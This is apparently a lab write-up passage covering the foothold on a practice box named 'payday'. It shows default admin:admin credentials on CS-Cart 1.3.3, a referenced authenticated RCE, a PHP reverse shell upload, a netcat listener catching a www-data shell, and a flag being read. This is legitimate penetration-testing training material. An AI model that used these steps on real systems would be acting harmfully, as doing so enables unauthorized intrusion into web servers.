Foothold

admin:admin

CS-Cart 1.3.3 - authenticated RCEExploit Database

https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

php-reverse-shellpentestmonkey

$ vi shell.phtml

$ nc -lnvp 1337                                  
listening on [any] 1337 ...

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.217.39] 40620
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 21:29:38 up 18 min,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/patrick/local.txt
884d8bfc383ba1ab27b5c4665f7d8952
$ ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:bf:12:f9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.217.39/24 brd 192.168.217.255 scope global eth0
    inet6 fe80::250:56ff:febf:12f9/64 scope link 
       valid_lft forever preferred_lft forever

Previous445 NextEnumeration

Last updated 10 months ago